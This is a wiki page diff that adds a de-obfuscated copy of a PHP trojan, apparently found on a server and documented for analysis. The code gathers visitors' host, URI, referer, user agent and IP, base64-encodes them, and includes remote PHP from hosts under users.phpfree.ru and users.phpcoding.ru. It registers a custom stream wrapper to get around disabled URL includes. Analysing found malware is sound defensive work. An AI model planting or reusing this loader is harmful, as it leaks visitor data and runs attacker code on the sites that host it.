Differences

This shows you the differences between two versions of the page.

--- php:possible_trojan [2016/10/14 22:48] – peter
+++ php:possible_trojan [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 39: / Line 39: @@
 if ((include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGZyZWUucnU=").'/?'.$str.'.2'))){}
 else {include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==").'/?'.$str.'.3');}
+}
+</code>
+===== de-obfuscated =====
+<code php>
+<?php
+class newhttp
+{
+	var $fullurl;
+	var $p_url;
+	var $conn_id;
+	var $flushed;
+	var $mode = 4;
+	var $defmode;
+	var $redirects = 0;
+	var $binary;
+	var $options;
+	var $stat = array (
+		'dev' => 0,
+		'ino' => 0,
+		'mode' => 0,
+		'nlink' => 1,
+		'uid' => 0,
+		'gid' => 0,
+		'rdev' => -1,
+		'size' => 0,
+		'atime' => 0,
+		'mtime' => 0,
+		'ctime' => 0,
+		'blksize' => -1,
+		'blocks' => 0
+	);
+	function error($msg = 'not connected') {
+		if ($this->options & STREAM_REPORT_ERRORS) {
+			trigger_error($msg, E_USER_WARNING);
+		}
+		return false;
+	}
+	function stream_open($path, $mode, $options, $opened_path) {
+		$this->fullurl = $path;
+		$this->options = $options;
+		$this->defmode = $mode;
+		$url = parse_url($path);
+		if (empty($url['host'])) {
+			return $this->error('missing host name');
+		}
+		$this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2);
+		if (!$this->conn_id) {
+			return false;
+		}
+		if (empty($url['path'])) {
+			$url['path'] = '/';
+		}
+		$this->p_url = $url;
+		$this->flushed = false;
+		if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) {
+			$this->mode += 2;
+		}
+		$this->binary = (strpos($mode, 'b') !== false);
+		$c = $this->context();
+		if (!isset($c['method'])) {
+			stream_context_set_option($this->context, 'http', 'method', 'GET');
+		}
+		if (!isset($c['header'])) {
+			stream_context_set_option($this->context, 'http', 'header', '');
+		}
+		if (!isset($c['user_agent'])) {
+			stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent'));
+		}
+		if (!isset($c['content'])) {
+			stream_context_set_option($this->context, 'http', 'content', '');
+		}
+		if (!isset($c['max_redirects'])) {
+			stream_context_set_option($this->context, 'http', 'max_redirects', 5);
+		}
+		return true;
+	}
+	function stream_close() {
+		if ($this->conn_id) {
+			fclose($this->conn_id);
+			$this->conn_id = null;
+		}
+	}
+	function stream_read($bytes) {
+		if (!$this->conn_id) {
+			return $this->error();
+		}
+		if (!$this->flushed && !$this->stream_flush()) {
+			return false;
+		}
+		if (feof($this->conn_id)) {
+			return '';
+		}
+		$bytes = max(1, $bytes);
+		if ($this->binary) {
+			return fread($this->conn_id, $bytes);
+		} else {
+			return fgets($this->conn_id, $bytes);
+		}
+	}
+	function stream_write($data) {
+		if (!$this->conn_id) {
+			return $this->error();
+		}
+		if (!$this->mode & 2) {
+			return $this->error('Stream is in read-only mode');
+		}
+		$c = $this->context();
+		stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST'));
+		if (stream_context_set_option($this->context, 'http', 'content', $c['content'] . $data)) {
+			return strlen($data);
+		}
+		return 0;
+	}
+	function stream_eof() {
+		if (!$this->conn_id) {
+			return true;
+		}
+		if (!$this->flushed) {
+			return false;
+		}
+		return feof($this->conn_id);
+	}
+	function stream_seek($offset, $whence) { return false; }
+	function stream_tell() { return 0; }
+	function stream_flush() {
+		if ($this->flushed) {
+			return false;
+		}
+		if (!$this->conn_id) {
+			return $this->error();
+		}
+		$c = $this->context();
+		$this->flushed = true;
+		$RequestHeaders = array (
+			$c['method'] . ' ' . $this->p_url['path'] . (empty($this->p_url['query']) ? '' : '?' . $this->p_url['query']) . ' HTTP/1.0',
+			'HOST: ' . $this->p_url['host'],
+			'User-Agent: ' . $c['user_agent'] . ' StreamReader'
+		);
+		if (!empty($c['header'])) {
+			$RequestHeaders[] = $c['header'];
+		}
+		if (!empty($c['content'])) {
+			if ($c['method'] == 'PUT') {
+				$RequestHeaders[] = 'Content-Type: ' . ($this->binary ? 'application/octet-stream' : 'text/plain');
+			} else {
+				$RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded';
+			}
+			$RequestHeaders[] = 'Content-Length: ' . strlen($c['content']);
+		}
+		$RequestHeaders[] = 'Connection: close';
+		if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders) . "\r\n\r\n") === false) {
+			return false;
+		}
+		if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) {
+			return false;
+		}
+		global $http_response_header;
+		$http_response_header = fgets($this->conn_id, 300);
+		$data = rtrim($http_response_header);
+		preg_match('#.* ([0-9]+) (.*)#i', $data, $head);
+		if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) {
+			$data = rtrim(fgets($this->conn_id, 300));
+			while (!empty($data)) {
+				if (strpos($data, 'Location: ') !== false) {
+					$new_location = trim(str_replace('Location: ', '', $data));
+					break;
+				}
+				$data = rtrim(fgets($this->conn_id, 300));
+			}
+			trigger_error($this->fullurl . ' ' . $head[2] . ': ' . $new_location, E_USER_NOTICE);
+			$this->stream_close();
+			return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush());
+		}
+		$data = rtrim(fgets($this->conn_id, 1024));
+		while (!empty($data)) {
+			$http_response_header .= $data . "\r\n";
+			if (strpos($data, 'Content-Length: ') !== false) {
+				$this->stat['size'] = trim(str_replace('Content-Length: ', '', $data));
+			}  elseif (strpos($data, 'Date: ') !== false) {
+				$this->stat['atime'] = strtotime(str_replace('Date: ', '', $data));
+			}  elseif (strpos($data, 'Last-Modified: ') !== false) {
+				$this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data));
+			}
+			$data = rtrim(fgets($this->conn_id, 1024));
+		}
+		if ($head[1] >= 400) {
+			trigger_error($this->fullurl . ' ' . $head[2], E_USER_WARNING);
+			return false;
+		}
+		if ($head[1] == 304) {
+			trigger_error($this->fullurl . ' ' . $head[2], E_USER_NOTICE);
+			return false;
+		}
+		return true;
+	}
+	function stream_stat() {
+		$this->stream_flush();
+		return $this->stat;
+	}
+	function dir_opendir($path, $options) { return false; }
+	function dir_readdir() { return ''; }
+	function dir_rewinddir() { return ''; }
+	function dir_closedir() { return; }
+	function url_stat($path, $flags) { return array (); }
+	function context() {
+		if (!$this->context) {
+			$this->context = stream_context_create();
+		}
+		$c = stream_context_get_options($this->context);
+		return (isset($c['http']) ? $c['http'] : array ());
+	}
+}
+$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
+$b = (isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
+$c = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
+$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
+$e = (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
+$f = (isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
+$g = (isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
+$h = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
+$str = base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g)
+	. "." . base64_encode($h) . ".$s";
+$rkht = 1;
+if (version_compare(PHP_VERSION, '5.2', '>=')) {
+	if (ini_get('allow_url_include')) {
+		$rkht = 1;
+	} else {
+		$rkht = 0;
+	}
+}
+if ($rkht == 1) {
+	if (ini_get('allow_url_fopen')) {
+		$rkht = 1;
+	} else {
+		$rkht = 0;
+	}
+}
+if ($rkht == 1) {
+	if ((include("http://" . $p . ".users.phpfree.ru" . '/?' . $str . '.0'))) { }
+	else {
+		include("http://" . $p . ".users.phpcoding.ru" . '/?' . $str . '.1');
+	}
+} else {
+	stream_wrapper_register('http2', 'newhttp');
+	if ((include("http2://" . $p . ".users.phpfree.ru" . '/?' . $str . '.2'))) { }
+	else {
+		include("http2://" . $p . ".users.phpcoding.ru" . '/?' . $str . '.3');
+	}
 }